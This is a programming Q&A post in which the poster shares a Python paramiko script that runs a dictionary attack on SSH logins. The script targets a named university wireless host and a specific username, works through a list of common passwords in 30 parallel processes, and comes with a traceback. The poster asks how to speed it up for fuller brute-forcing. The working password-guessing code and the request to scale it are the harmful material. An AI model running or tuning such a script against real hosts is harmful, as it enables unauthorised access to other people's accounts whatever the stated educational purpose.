# How to speed up Python SSH Dictionary Script?

Tags: python, ssh, multiprocessing

I have a python script to dictionary hack its way into my computer.  Pass.txt contains the list of the 10000 most common passwords, yet these all seem pretty unlikely, so I was wondering how to speed this up.  I'm currently using 30 processes, cuz based on empirical testing, that seems to be what gets through words the fastest.  At the current rate, I can go through 10000 words in ~14 min.  This is nowhere near the speed necessary to expand this to a more thorough brute force attack, so what changes should I make?
Also, in the attempt method, to get count to increment correctly, I have to use += cores.   But if 30 proccess are running the method, and it incremented by one everytime, wouldn't it correctly count the number of passwords checked?

The code I have is below:

```
import paramiko
from multiprocessing import Pool

count = 0
cores = 30
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())


def Attempt(password):
    global pool
    global count
    global cores
    global ssh
    try:
        print count, password
        count += 30
        ssh.connect('wl-10-191-20-76.wireless.duke.edu',
                    username='samadwara', password=password)
    except paramiko.AuthenticationException:
        pass
    else:
        print "Your password is: %s" % password
        print count
        pool.terminate()
        pool.join()

pool = Pool(processes=cores)
f = open('pass.txt', 'r')
pool.map(Attempt, f.read().split())
```

Note:  This is for educational purposes.  If I just wanted to get into a computer, I would just use Hydra or some other premade program.

Also, now I'm getting some weird EOFError, but it's still in the middle of the text file?  Any idea what's wrong?

```
450 wang
420 italia
450 master1
420 engine
450 chris
420 butler
420 magic1
450 apollo
420 willis
450 victory
480 stoner
Traceback (most recent call last):
  File "SSH.py", line 30, in <module>
    pool.map(Attempt, f.read().split())
  File "/Applications/Canopy.app/appdata/canopy-1.2.0.1610.macosx-x86_64/Canopy.app/Contents/lib/python2.7/multiprocessing/pool.py", line 227, in map
    return self.map_async(func, iterable, chunksize).get()
  File "/Applications/Canopy.app/appdata/canopy-1.2.0.1610.macosx-x86_64/Canopy.app/Contents/lib/python2.7/multiprocessing/pool.py", line 528, in get
    raise self._value
EOFError
450 hawk
```

Comment: I'd be really interested to see what that error ends up being.  Have you tried asking this on any other sites or code review?